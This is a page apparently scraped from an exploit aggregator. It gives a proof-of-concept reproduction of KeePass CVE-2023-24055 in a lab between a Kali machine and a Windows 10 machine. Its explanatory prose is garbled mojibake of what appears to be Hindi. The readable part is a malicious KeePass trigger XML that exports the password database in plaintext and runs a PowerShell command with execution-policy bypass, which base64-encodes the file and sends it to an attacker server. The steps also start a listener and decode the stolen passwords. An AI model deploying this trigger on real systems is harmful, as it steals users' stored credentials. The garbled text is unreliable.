## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZWLSIX-KEEPASS-CVE-2023-24055
# KeePass-CVE-2023-24055
KeePass CVE-2023-24055 рдХрд╛ рдкреБрдирд░реБрддреНрдкрд╛рджрди KeePass CVE-2023-24055 рдХрд╛ рдкреБрдирд░реБрддреНрдкрд╛рджрди
1, рдорд╢реАрди рддреИрдпрд╛рд░ рдХрд░реЗрдВ: kali (192.168.232.129), windows10 (192.168.232.128)
2, KeePass рд╕рдВрд╕реНрдХрд░рдг: 2.53

2, рд╕рд┐рджреНрдзрд╛рдВрдд: KeePass рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдлрд╝рд╛рдЗрд▓ KeePass.config.xml рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдХреЗ, рдПрдХ рдЯреНрд░рд┐рдЧрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдЖрдЗрдЯрдо рдЬреЛрдбрд╝реЗрдВ: рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ рдФрд░ рдЙрдиреНрд╣реЗрдВ рд╣рдорд▓рд╛рд╡рд░ рдХреЗ рд╕рд░реНрд╡рд░ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВ; рдЯреНрд░рд┐рдЧрд░ рдЬреЛрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП XML рдХреЛрдб рдЗрд╕ рдкреНрд░рдХрд╛рд░ рд╣реИ:
рдЗрд╕рдореЗрдВ: `<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>` рдлрд╝реАрд▓реНрдб рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рд░реНрдпрд╛рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕реНрдерд╛рдиреАрдп рдкрде рд╕реЗрдЯ рдХрд░рддрд╛ рд╣реИ
рдкрд╛рд╡рд░рд╢реЗрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ GET рд╡рд┐рдзрд┐ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдлрд╝рд╛рдЗрд▓ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░реЗрдВ
root@kitploit:~
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
root@kitploit:~
<Triggers>
<Trigger>
<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
<Name>exploit</Name>
<Events>
<Event>
<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
<Parameters>
<Parameter>0</Parameter>
<Parameter />
</Parameters>
</Event>
</Events>
<Conditions />
<Actions>
<Action>
<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
<Parameters>
<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
<Parameter>KeePass XML (2.x)</Parameter>
<Parameter />
<Parameter />
</Parameters>
</Action>
<Action>
<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
<Parameters>
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
<Parameter>False</Parameter>
<Parameter>1</Parameter>
<Parameter />
</Parameters>
</Action>
</Actions>
</Trigger>
</Triggers>
3, KeePass.config.xml рдлрд╝рд╛рдЗрд▓ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░реЗрдВ, XML рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдЖрдЗрдЯрдо рдЬреЛрдбрд╝реЗрдВ рдФрд░ рд╕рд╣реЗрдЬреЗрдВ (рдЬреЛрдбрд╝рдиреЗ рдХрд╛ рд╕реНрдерд╛рди: `<TriggerSystem></TriggerSystem>` рдЯреИрдЧ рдХреЗ рдЕрдВрджрд░), рдпрд╣ рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП KeePass рдЦреЛрд▓реЗрдВ рдХрд┐ рдЬреЛрдбрд╝ рд╕рдлрд▓ рд░рд╣рд╛ рдпрд╛ рдирд╣реАрдВ:

4, рдХрд▓реА рдЦреЛрд▓реЗрдВ рдФрд░ рд╡реЗрдм рд╕реЗрд╡рд╛ рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдорд╛рдВрдб python3 -m http.server 8888 рдЪрд▓рд╛рдПрдБ, рддрд╛рдХрд┐ рдирд┐рд░реНрдпрд╛рдд рдХрд┐рдП рдЧрдП рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд┐рдП рдЬрд╛ рд╕рдХреЗрдВ

5, KeePass рдЦреЛрд▓реЗрдВ, рдПрдХ рдирдпрд╛ рд░рд┐рдХреЙрд░реНрдб рдмрдирд╛рдПрдБ рдФрд░ рд╕рд╣реЗрдЬреЗрдВ, рдЯреНрд░рд┐рдЧрд░ рд╕рдХреНрд░рд┐рдп рд╣реЛ рдЬрд╛рдПрдЧрд╛, рдХрд▓реА рджреНрд╡рд╛рд░рд╛ рдкреНрд░рд╛рдкреНрдд рд╕рд╛рдордЧреНрд░реА рджреЗрдЦреЗрдВ:

6, рд╕рд╛рдордЧреНрд░реА рдХреЛ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдХреЙрдкреА рдХрд░реЗрдВ, рдФрд░ base64 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдбрд┐рдХреЛрдб рдХрд░реЗрдВ, рдлрд┐рд░ рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рд╣реЛрдЧрд╛


рд╕рдВрджрд░реНрдн рд▓реЗрдЦ: https://github.com/alt3kx/CVE-2023-24055_PoC
https://www.youtube.com/watch?v=tqK1bns51ek